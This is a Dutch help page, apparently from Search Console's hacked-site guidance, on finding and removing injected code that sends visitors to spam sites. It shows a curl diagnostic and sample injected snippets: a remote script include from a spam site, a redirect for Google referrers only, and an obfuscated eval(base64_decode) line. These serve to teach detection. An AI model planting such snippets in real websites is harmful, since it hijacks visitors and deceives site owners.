Type hackingactie: Invoeging van code

Wat houdt het in als mijn pagina's zijn gemarkeerd met het type hackingactie 'Invoeging van code' in Search Console?

Dit houdt in dat een hacker uw site heeft aangetast en gebruikers omleidt van uw site naar een site die spam bevat. Soms worden alleen bepaalde gebruikers doorgestuurd, op basis van hun locatie, verwijzende URL of het apparaat dat ze gebruiken (zoals een mobiele telefoon). De hacker kan de schadelijke code rechtstreeks hebben ingevoegd in de HTML-bestanden van uw site (bijvoorbeeld een JavaScript-omleiding) of in bestanden die de inhoud van uw site genereren (bijvoorbeeld PHP-bestanden). Een andere manier waarop de hacker bezoekers kan omleiden, is door de configuratiebestand(en) van uw server(s) te wijzigen. In de configuratiebestanden van de server kan de beheerder de URL's specificeren waarnaar pagina's of directory's op een website omleiden. Op Apache-servers zijn dit bijvoorbeeld het .htaccess-bestand en httpd.conf. (Raadpleeg Stap 2: Een ondersteuningsteam samenstellen in het herstelproces 'Hulp bij gehackte sites' als u niet goed weet hoe u de configuratiebestanden van uw server kunt onderzoeken).

Raadpleeg Stap 5: De schade beoordelen (spam) voor meer algemene informatie over door spam aangetaste sites.

Hoe kan ik de omleiding op een dergelijke pagina onderzoeken?

Gebruik niet uw browser om gehackte pagina's op uw site weer te geven. Dit is omdat hackers pagina's vaak configureren op basis van eigenschappen zoals:

  • Locatie, vaak afgeleid van een IP-adres
  • Verwijzende URL, zoals een pagina met zoekresultaten
  • User-agent, zoals een mobiele of minder veilige browser

Controleer dit gedrag met behulp van de volgende techniek:

  • Use cURL or Wget to fetch a page:
    These freely available tools let you view the source of the page as seen by a search engine, and have the flexibility to include referrer or user-agent information. By serving spammy content only to users with specific user-agents or referrers, the hacker can target more "real people" and can better avoid detection from site owners and anti-hacking algorithms used by search engines. (Your site will need to be online to use these tools.) For example:
    $curl -v --referer "http://www.google.com/search?q=page" --user-agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html
  • Ophalen van een pagina met een aangetaste serverconfiguratie kan de volgende headers opleveren:

    ...
    < HTTP/1.1 301 Moved Permanently
    < Date: Sun, 24 Feb 2013 21:06:45 GMT
    < Server: Apache
    < Location: http://<spam-site>/index.html
    < Content-Length: 253
    …
    

    Of u kunt tijdens het inspecteren van de inhoud van de geretourneerde pagina als volgt ingevoegde code zien:

    • JavaScript of een andere scripttaal die scripts van een spamsite aanroept en uitvoert: <script type='text/javascript' src='http://spam-site/js/x55.js'></script>
    • Script dat de browser omleidt naar een spamsite:
      
      <script>
      if (document.referrer.match(/google\.com/)) { window.location("http://spam-site/"); } </script>
    • Spamcode die is verborgen om ontdekking te voorkomen:
      eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

    Onderzoek alle mogelijke verdachte code die aanwezig is op de site. Het kan helpen om te zoeken op woorden als 'script' om JavaScript-code te vinden. Andere nuttige zoekwoorden zijn 'eval', 'unescape', enzovoort.

    Hoe kan ik mijn site ontdoen van het type hackingactie 'Invoeging van code'?

    Als u klaar bent om uw site schoon te maken (Stap 7 van het herstelproces 'Hulp bij gehackte sites') kunt u aangetaste bestanden ofwel vervangen door de laatste goede back-up, of de ingevoegde code van elke pagina en alle bijbehorende scriptfuncties en bestanden verwijderen. Als u configuratiebestanden van uw server heeft gewijzigd, kan het zijn dat u uw webserver opnieuw moet opstarten om de wijzigingen in te laten gaan.

    Schoonmaken van het type hackingactie 'Invoeging van code' is nuttig bij het herstellen van een gehackte site, maar hiermee lost u de onderliggende zwakke plek niet op, waardoor de hacker uw site in eerste instantie kon aantasten. Als u de hoofdoorzaak niet aanpakt, kan uw site in de toekomst opnieuw worden gehackt. Het is bijvoorbeeld nuttig om alle software op uw site, zoals een verouderde versie van WordPress, te updaten. Raadpleeg 'Beoordelen van schade aan het bestandssysteem' in Stap 5: De schade beoordelen (spam) van 'Hulp bij gehackte sites' voor meer informatie over het schoonmaken van uw gehele site, niet alleen dit type hackingactie.

    Was dit nuttig?
    Hoe kunnen we dit verbeteren?